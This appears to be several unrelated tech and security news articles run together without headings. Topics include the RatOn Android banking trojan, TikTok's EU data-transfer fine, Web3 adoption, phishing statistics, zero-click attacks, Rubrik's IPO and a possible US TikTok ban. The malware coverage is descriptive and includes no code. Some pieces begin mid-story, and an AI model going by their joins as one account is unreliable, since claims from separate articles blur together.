A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.
How It Spreads
RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”
Capabilities and Tactics
The trojan’s abilities are wide-ranging:
1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.
2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George Česko, a Czech banking app, by simulating taps and inputs.
3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.
4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.
Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.
Development and Targets
The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.
Why It Matters
RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.
Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.
TikTok’s lead regulator in Europe, Ireland’s Data Protection Commission (DPC), said that TikTok acknowledged during the probe that it had hosted European user data in China. DPC deputy commissioner Graham Doyle said that “TikTok failed to verify, guarantee, and demonstrate that the personal data of (European) users, remotely accessed by staff in China, was afforded a level of protection essentially equivalent to that guaranteed within the EU.”
Doyle also said that TikTok failed to address the risk that Chinese authorities could access Europeans’ personal data under China’s anti-terrorism, counter-espionage, and other laws, which TikTok itself had found to differ from the EU’s data protection standards.
TikTok has said it will contest the heavy EU fine despite the findings. TikTok Europe’s Christine Grahn stressed that the company has “never received a request” from authorities in China for European users’ data and that TikTok has never given EU users’ data to Chinese authorities. “We disagree with this decision and intend to appeal it in full,” Grahn said.
TikTok boasts a massive 1.5 billion users worldwide. In recent years, the social media platform has been under tough pressure from Western governments due to worries about the misuse of data by Chinese actors for surveillance and propaganda aims.
In 2023, the Irish DPC fined TikTok 345 million euros for violating EU rules on the processing of children’s data. The DPC’s latest decision found that TikTok also violated the EU’s General Data Protection Regulation (GDPR) by transferring user data to China. The decision includes a 530 million euro administrative penalty plus an order that TikTok bring its data processing into line with EU requirements within six months.
Web3 technology promises to transform the internet, making it decentralized, secure, and transparent. However, many people hesitate to adopt it due to a lack of trust in the technology. Building this trust requires clear explanations, user-friendly experiences, and a solid infrastructure.
Social Media: A Gateway to Web3
Platforms like TikTok have become key tools for introducing users to Web3. For example, Hamster Kombat, a cryptocurrency-based game, attracted over 300 million players using TikTok. The platform made it easy for users to learn about the game by sharing tutorials, guides, and strategies, building trust among new players.
Similarly, SonicX, a popular tap-to-earn game, onboarded over two million users through TikTok. The team behind the game, Sonic SVM, simplified the process for users by creating automatic wallets and removing transaction fees, making it feel like a traditional app. These efforts demonstrate how social media can act as a bridge between Web2 and Web3, helping more people understand and use these technologies.
Why Strong Infrastructure Matters
While social media helps with onboarding, a dependable Web3 infrastructure is essential for long-term success. Powerloom, for example, offers a decentralized network of over 5,300 nodes that collect and update blockchain data in real time. This ensures that decentralized applications (dApps) and smart contracts always operate with accurate information. By eliminating outdated data risks, Powerloom strengthens user confidence in Web3 platforms.
Blockchain and dApps: Trust-Building Tools
At its core, blockchain technology ensures security and transparency. It uses decentralized networks and cryptography to prevent tampering with data. This builds trust, as users can rely on the integrity of the system.
Decentralized applications (dApps) also play a vital role. Take Uniswap, for instance. Its open-source code is accessible to anyone for verification, and regular security audits ensure its reliability. Users can trade or add liquidity without needing approval, reinforcing the trustworthiness of the platform.
Reputation Through Tokenization
Tokenization brings another layer of trust by rewarding users with reputation tokens for positive actions. These tokens serve as a record of reliability and contributions, discouraging malicious activity. In decentralized marketplaces, they enable peer-to-peer reviews without depending on centralized authorities, making the system fairer and more transparent.
Web3 technology has immense potential, but its adoption depends on trust. Social media, combined with secure infrastructure, transparent dApps, and reputation systems, can make this next phase of the internet more accessible and trustworthy. By focusing on these elements, Web3 can achieve its vision of a decentralized and user-driven digital world.
At least one malicious email evades Secure Email Gateways (SEGs), including Proofpoint and Microsoft, every 45 seconds, a significant rise from last year’s rate of one every 57 seconds, according to Cofense Intelligence’s third-quarter report.
A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.
Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.
According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.
TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.
The use of malicious Office documents, particularly those in .docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.
Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.
Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of .ru and .su top-level domains (TLDs). Domains with the .ru (Russia) and .su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.
As Forbes first reported, TikTok revealed that several high-profile accounts, including CNN and Paris Hilton, were compromised simply by being sent a direct message (DM). Attackers apparently used a zero-day vulnerability in the messaging component to run malicious code when the message was opened.
The NSA has advised all smartphone users to turn their devices off and back on once a week as a precaution against zero-click attacks, though the NSA acknowledges that this tactic will only occasionally stop such attacks from succeeding. There are still other steps you can take to protect yourself, and security software such as a reputable VPN can help.
As the name implies, a zero-click attack or exploit requires no activity from the victim. Malicious software can be installed on the targeted device without the user clicking on any links or downloading any harmful files.
This makes such attacks extremely difficult to detect: because no user interaction is required, there are far fewer signs of hostile activity for the victim to notice.
Zero-click exploits rely on unpatched flaws in software code, known as zero-day vulnerabilities. According to experts at security firm Kaspersky, apps with messaging or voice calling functions are frequent targets because “they are designed to receive and interpret data from untrusted sources,” making them more vulnerable.
Once a device vulnerability has been properly exploited, hackers can use malware, such as info stealers, to scrape your private data. Worse, they can install spyware in the background, recording all of your activity.
This is exactly how the Pegasus spyware attacked so many victims—more than 1,000 people in 50 countries, according to the 2021 joint investigation—without them even knowing it.
The same year, Citizen Lab security researchers revealed that the iPhones of nine Bahraini activists had been infected with Pegasus spyware using two zero-click iMessage bugs. In 2019, attackers used a WhatsApp zero-day vulnerability to inject malware onto devices via a missed call.
As the celebrity TikTok hack shows, social media platforms are becoming the next popular target. Meta, for example, recently patched a similar vulnerability that could have let attackers take over any Facebook account.
Rubrik, a data management company, recently made waves by going public through an initial public offering (IPO). The reception was nothing short of remarkable, signaling a shift in sentiment toward tech startups. For years, the public markets seemed somewhat closed to these fledgling companies, but Rubrik’s success challenges that notion.
The IPO process is a litmus test for any company. It involves transparency, financial scrutiny, and investor confidence. Rubrik’s strong pricing and positive market response indicate that investors are willing to embrace tech startups, provided they demonstrate robust fundamentals and growth potential.
As Rubrik’s stock ticker symbol blinks across trading screens, it serves as a beacon for other startups eyeing the public markets. The message is clear: If you have a compelling product, a solid business model, and a vision for the future, the IPO route is viable.
TikTok, the viral short-form video platform, has been on a rollercoaster ride. Loved by millions for its entertaining content, it also faces regulatory hurdles. The United States government has demanded that TikTok divest from its parent company or face a ban. This move underscores the geopolitical complexities surrounding tech companies.
Why the scrutiny? TikTok’s Chinese ownership raises concerns about data privacy, national security, and censorship. As the app continues to captivate users globally, governments grapple with how to balance innovation and security. The TikTok saga serves as a cautionary tale for tech companies operating in a globalized world.
For startups, understanding regulatory landscapes is crucial. Navigating legal frameworks, data protection laws, and geopolitical tensions requires strategic foresight. TikTok’s experience highlights the need for transparency, compliance, and proactive engagement with regulators.
TechCrunch hosted its annual Early Stage event, bringing together startups, investors, and industry experts. The event’s focus? Empowering early-stage companies to thrive.
In Boston, where the event took place, entrepreneurs pitched their ideas, networked, and absorbed insights from seasoned veterans. The buzz around early-stage startups was palpable. Investors scouted for promising ventures, and founders honed their pitches.
Why does this matter? Early-stage support is the lifeblood of innovation. Startups need mentorship, capital, and exposure to flourish.
China has criticized a proposed bill in the US Congress that could potentially lead to the banning of TikTok in the United States, labeling it as unfair. This action marks the latest development in a longstanding dispute over safety concerns regarding the popular app, which is owned by a Chinese company. Authorities, politicians, and security personnel in numerous Western nations have already been prohibited from installing TikTok on official devices.